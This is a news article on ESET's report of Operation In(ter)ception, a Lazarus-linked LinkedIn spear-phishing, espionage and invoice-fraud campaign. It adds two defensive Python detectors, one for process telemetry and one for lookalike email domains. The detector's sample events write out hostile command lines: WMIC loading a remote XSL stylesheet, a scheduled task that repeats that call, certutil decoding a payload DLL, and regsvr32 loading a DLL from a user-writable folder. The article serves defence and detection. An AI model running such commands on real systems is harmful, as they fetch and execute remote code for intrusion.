Cybersecurity researchers today disclosed a new, sophisticated cyber espionage campaign directed against aerospace and military organizations in Europe and the Middle East, aimed at spying on key employees of the targeted companies and, in some cases, even siphoning off money.
The campaign, dubbed "Operation In(ter)ception" after a reference to "Inception" found in a related malware sample, took place between September and December 2019, according to a new report that cybersecurity firm ESET shared with The Hacker News.
"The main goal of the operation was espionage," the researchers told The Hacker News. "However, in one of the cases we investigated, the attackers attempted to monetize access to a victim's email account through a Business Email Compromise (BEC) attack as the final stage of the operation."
The financial motivation behind the attacks, combined with similarities in targeting and in the development environment, has led ESET to suspect the Lazarus Group, a notorious hacking group working on behalf of the North Korean government that has been tasked with funding the country's illicit weapons and missile programs.
Social engineering via LinkedIn
ESET said the campaign was highly targeted and relied on social engineering: the attackers used LinkedIn's messaging feature to approach employees of the selected companies with fake job offers, posing as HR managers of well-known companies in the aerospace and defense industries, including Collins Aerospace and General Dynamics.
"Once contact was established, the attackers slipped malicious files into the communication, disguising them as documents related to the advertised job offer," the researchers said, based on an investigation with two of the affected European companies.
The decoy RAR archives, sent either directly in LinkedIn chats or in emails from the fake LinkedIn personas that pointed to a OneDrive link, purported to contain a PDF document listing salary information for specific positions. In reality they launched the Windows Command Prompt utility to perform a number of actions:
Copy the Windows Management Instrumentation command-line tool (wmic.exe) to a specific folder
Rename it to an innocuous-looking name to evade detection (e.g. Intel, NVidia, Skype, OneDrive and Mozilla), and
Create scheduled tasks that execute a remote XSL script via WMIC.
Once the actors behind the operation had gained an initial foothold in the target company, they deployed a custom malware downloader, which in turn fetched a previously undocumented second-stage payload: a C++ backdoor that periodically sent requests to an attacker-controlled server, carried out predefined actions based on the commands received, and exfiltrated the collected information as a RAR file using a modified version of dbxcli, an open-source command-line client for Dropbox.
In addition to abusing WMIC to interpret remote XSL scripts, the adversaries also leveraged native Windows utilities such as "certutil" to decode downloaded Base64-encoded payloads, and "rundll32" and "regsvr32" to execute their custom malware.
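Every step of the tradecraft described above leaves a footprint in ordinary process-creation telemetry, which makes it a good candidate for a host-based check. The following Python snippet is an added example for this article, not code from ESET's report or from the campaign itself: it runs a handful of rules over constructed records in the style of Sysmon Event ID 1 (the user name, paths, task name and the example.invalid URL are invented for illustration). The key observation is that Sysmon's OriginalFileName field comes from the binary's PE version resource, so a copy of wmic.exe renamed to Intel.exe still reports "wmic.exe" there, and a scheduled task or command line that passes WMIC a /format: stylesheet fetched over HTTP stands out on its own.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (not taken from any real incident): Sysmon Event ID 1 style
# process-creation records trimmed to the three fields the rules below need.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",          # benign admin use
     "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption"},
    {"Image": r"C:\Users\jdoe\AppData\Roaming\Intel\Intel.exe",  # renamed WMIC + remote XSL
     "OriginalFileName": "wmic.exe",
     "CommandLine": r'"C:\Users\jdoe\AppData\Roaming\Intel\Intel.exe" os get /format:"https://example.invalid/page.xsl"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",            # persistence for the above
     "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 5 /tn "Intel Update" /tr "C:\Users\jdoe\AppData\Roaming\Intel\Intel.exe os get /format:https://example.invalid/page.xsl"'},
    {"Image": r"C:\Windows\System32\certutil.exe",            # Base64 decode of a dropped blob
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -decode C:\Users\jdoe\AppData\Local\Temp\blob.txt C:\Users\jdoe\AppData\Local\Temp\payload.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",            # DLL loaded from a user-writable path
     "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r"regsvr32 /s C:\Users\jdoe\AppData\Roaming\OneDrive\upd.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",            # benign certutil use
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -verify C:\certs\server.cer"},
]

# WMIC's /format: switch accepts a stylesheet path or URL; a URL means remote XSL execution.
REMOTE_XSL_RE = re.compile(r'/format:\s*"?\s*(?:https?|ftp)://', re.IGNORECASE)
# Locations an unprivileged user can write to; system DLLs do not live here.
USER_WRITABLE_RE = re.compile(r'\\(?:Users|ProgramData|Temp)\\', re.IGNORECASE)
# certutil -decode / -decodehex turn a text blob back into a binary.
CERTUTIL_DECODE_RE = re.compile(r'(?:^|\s)-decode(?:hex)?\b', re.IGNORECASE)


def detect(event):
    """Return the list of rule names that fire on one process-creation event."""
    hits = []
    image = PureWindowsPath(event["Image"]).name.lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")

    # 1. Masquerading: the version resource still says wmic.exe but the file on disk
    #    carries another name (Intel.exe, Skype.exe, ...). A plain rename does not defeat this.
    if original == "wmic.exe" and image != "wmic.exe":
        hits.append("renamed_wmic")

    # 2. WMIC asked to render its output with a stylesheet pulled over the network.
    if original == "wmic.exe" and REMOTE_XSL_RE.search(cmdline):
        hits.append("wmic_remote_xsl")

    # 3. A scheduled task whose action contains the same remote-XSL invocation.
    if original == "schtasks.exe" and "/create" in cmdline.lower() and REMOTE_XSL_RE.search(cmdline):
        hits.append("schtasks_remote_xsl")

    # 4. certutil used as a Base64 decoder rather than for certificate work.
    if original == "certutil.exe" and CERTUTIL_DECODE_RE.search(cmdline):
        hits.append("certutil_decode")

    # 5. rundll32/regsvr32 loading a DLL from a user-writable location.
    if original in ("rundll32.exe", "regsvr32.exe") and USER_WRITABLE_RE.search(cmdline):
        hits.append(original[:-4] + "_user_writable_dll")

    return hits


def scan(events):
    """Map the index of every event that triggered at least one rule to its rule names."""
    findings = {}
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], rules)
```

Rules 1 and 2 depend on telemetry that records the PE's original file name (Sysmon does; a bare Security 4688 event does not), and rule 5 will need tuning for legitimate updaters that run from AppData. The point is less the exact regexes than that each stage of this intrusion chain, as described in the report, is visible without any signature for the malware itself.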
Financially motivated BEC attacks
Beyond espionage, ESET researchers also found evidence of the attackers attempting to use the compromised accounts to extract money from other companies.
Although the attempt was unsuccessful, the monetization tactic worked by leveraging the existing email communication between the account holder and a customer of the company in an effort to get a pending invoice paid to a different bank account under the attackers' control.
"As part of this ruse, the attackers registered a domain name identical to that of the compromised company, but on a different top-level domain, and used an email address associated with this fake domain for further communication with the targeted customer," ESET said.
Ultimately, the targeted customer reached out to the victim's correct email address about the suspicious message, thereby thwarting the attackers' attempt.
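The lookalike domain the attackers registered is exactly the kind of thing a receiving mail gateway can flag mechanically: a sender whose registrable label matches a known counterparty's but sits under a different public suffix. The Python snippet below is an added example for this article, not ESET's code or anything recovered from the incident. The supplier domain acme-aero.com, the customer domain and the three messages are constructed, and the small set of multi-label suffixes stands in for the full Public Suffix List a real deployment would use. It classifies the domain in each sender-related header as trusted, a TLD swap of a trusted counterparty, or unknown, which also catches the variant where From looks legitimate but Reply-To is redirected to the fake domain.

```python
from email import message_from_string
from email.utils import parseaddr

# Assumption: a stand-in for the Public Suffix List, just enough for the examples below.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br"}

# Constructed: the counterparties whose invoices this customer expects to receive.
TRUSTED_SUPPLIERS = ["acme-aero.com"]

# Constructed sample messages; none of these addresses or domains are real.
LEGIT_MESSAGE = """From: "Accounts Payable" <ap@acme-aero.com>
To: treasury@customer.example
Subject: Invoice 4471

Please find the invoice attached.
"""

SWAPPED_MESSAGE = """From: "Accounts Payable" <ap@acme-aero.net>
Reply-To: ap@acme-aero.net
To: treasury@customer.example
Subject: RE: Invoice 4471 - updated banking details

Please remit to the new account listed below.
"""

REDIRECTED_MESSAGE = """From: "Accounts Payable" <ap@acme-aero.com>
Reply-To: ap@acme-aero.net
To: treasury@customer.example
Subject: RE: Invoice 4471

Please confirm receipt.
"""


def split_domain(domain):
    """Return (registrable_label, public_suffix), e.g. ('acme-aero', 'co.uk') for
    'mail.acme-aero.co.uk' and ('acme-aero', 'com') for 'acme-aero.com'."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return domain.lower(), ""
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return labels[-3], ".".join(labels[-2:])
    return labels[-2], labels[-1]


def classify_domain(domain, trusted_domains):
    """'trusted' for a known counterparty or one of its subdomains, 'tld_swap' when the
    registrable label matches a counterparty but the public suffix differs, else 'unknown'."""
    d = domain.lower()
    for trusted in trusted_domains:
        t = trusted.lower()
        if d == t or d.endswith("." + t):
            return "trusted"
    label, suffix = split_domain(d)
    for trusted in trusted_domains:
        t_label, t_suffix = split_domain(trusted)
        if label == t_label and suffix != t_suffix:
            return "tld_swap"
    return "unknown"


def address_domain(header_value):
    """Extract the domain part of an address header such as '"Name" <user@host>'."""
    addr = parseaddr(header_value)[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def check_message(raw_message, trusted_domains):
    """Classify the domain behind every sender-related header present in the message.
    Reply-To is checked separately because replies go there, not to the From address."""
    msg = message_from_string(raw_message)
    findings = {}
    for header in ("From", "Reply-To", "Return-Path"):
        value = msg.get(header)
        if value:
            findings[header] = classify_domain(address_domain(value), trusted_domains)
    return findings


def is_tld_swap(findings):
    """True if any checked header points at a lookalike of a trusted counterparty."""
    return "tld_swap" in findings.values()


if __name__ == "__main__":
    for name, raw in (("legit", LEGIT_MESSAGE), ("swapped", SWAPPED_MESSAGE),
                      ("redirected", REDIRECTED_MESSAGE)):
        result = check_message(raw, TRUSTED_SUPPLIERS)
        print(name, result, "SUSPICIOUS" if is_tld_swap(result) else "ok")
```

A check like this only flags the fake domain; it would not have caught the earlier messages sent from the genuinely compromised mailbox, which is why the out-of-band confirmation the customer performed here (contacting the supplier at a known-good address before changing payment details) remains the control that actually stopped the fraud.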
"Our research into Operation In(ter)ception shows once again how effective spear-phishing can be at compromising a target of interest," the researchers concluded.
"The attacks were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware. To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities, and impersonated legitimate software and companies."